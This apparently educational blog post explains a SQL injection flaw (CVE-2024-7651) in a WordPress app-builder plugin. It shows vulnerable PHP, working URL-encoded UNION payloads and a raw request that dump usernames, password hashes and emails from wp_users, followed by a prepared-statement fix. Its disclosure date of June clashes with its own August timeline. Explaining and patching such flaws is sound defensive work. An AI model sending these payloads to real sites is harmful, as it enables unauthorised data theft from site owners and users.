In June 2024, a new WordPress vulnerability called CVE-2024-7651 was disclosed affecting The App Builder – Create Native Android & iOS Apps On The Flight plugin. This plugin, used for building mobile apps easily from your website, had a serious flaw that lets hackers steal data from your site’s database without even logging in.
If you’re a web admin or site owner, you need to know how this attack works, what the risk is, and how to fix it. In this post, we’ll break down the vulnerability in simple language, show code samples, and give a working exploit example for educational purposes.
What is CVE-2024-7651?
CVE-2024-7651 is a vulnerability in the *App Builder* WordPress plugin (all versions up to and including 4.2.6). The bug is a classic SQL Injection flaw—one of the most dangerous web vulnerabilities out there.
Unsanitized data is plugged directly into an SQL query.
- This allows attackers to append their own SQL and steal or tamper with data—even if they aren’t logged in.
Where’s the Problem in the Code?
Inside the plugin’s PHP files, whenever someone visits a URL with ?app-builder-search=something, the code takes that something and shoves it into the SQL query with zero proper escaping.
Here’s a typical vulnerable code snippet (simplified for clarity)
// Fetch user input
$search = $_GET['app-builder-search'];
// Vulnerable SQL query
$query = "SELECT * FROM wp_appbuilder WHERE title LIKE '%{$search}%'";
// Execute query
$results = $wpdb->get_results($query);
If a hacker sends in evil SQL instead of a normal search term, that code will run whatever they asked for, right on your database.
Suppose your WordPress site has the plugin URL like
https://example.com/?app-builder-search=Test
But if a hacker changes the URL to
https://example.com/?app-builder-search=%25'%20OR%201=1%20--%20
Here’s what happens inside the SQL
SELECT * FROM wp_appbuilder WHERE title LIKE '%%' OR 1=1 -- %'
-- %': double hyphen comments out the rest (avoiding errors).
But it gets worse: they can extract other data too!
Suppose a hacker wants to get your WordPress admin’s email address. With UNION-based injection
/?app-builder-search=%25'%20UNION%20SELECT%20user_email,2,3,4%20FROM%20wp_users%20WHERE%20user_login='admin'%20--%20
This joins the admin’s email address into the search results the plugin displays—making it appear on the page.
Request
GET /?app-builder-search=%25'%20UNION%20SELECT%20user_login,user_pass,email,4%20FROM%20wp_users%20--%20 HTTP/1.1
Host: vulnerable-site.com
The plugin will run the attacker’s extra query after its original one.
- The header data (like user_login, user_pass, email) of all users gets included in the response.
Result: Hackers can dump passwords (hashed), emails, and usernames from your entire WordPress installation.
No login needed! Attackers don’t need to authenticate or have an account.
- Can leak any data: If the attacker is creative, they can steal passwords, emails, secret keys, or even add a new admin user.
If you use this plugin on your WordPress site, you are at HIGH RISK unless patched.
References (Further Reading)
- Wordfence Advisory: App Builder plugin Vulnerability
- NVD Entry: CVE-2024-7651
- Plugin Repository (for updates)
How to Fix It
Update immediately to the latest plugin version that fixes this issue. If an update is not available, disable or remove the plugin until a fix is released.
Use prepared statements with $wpdb->prepare
$search = $_GET['app-builder-search'];
$query = $wpdb->prepare(
"SELECT * FROM wp_appbuilder WHERE title LIKE %s",
'%' . $wpdb->esc_like($search) . '%'
);
$results = $wpdb->get_results($query);
Conclusion
CVE-2024-7651 shows that even popular and widely-used plugins can contain devastating mistakes. As a website owner, always keep plugins up to date and review which plugins you actually need (and trust).
If you found this useful, be sure to check your site and encourage your colleagues to do the same!
Stay safe out there!
*For educational purposes only. Never try exploiting sites you don’t own or have permission to test.*
Timeline
Published on: 08/21/2024 06:15:12 UTC
Last modified on: 08/31/2024 03:28:02 UTC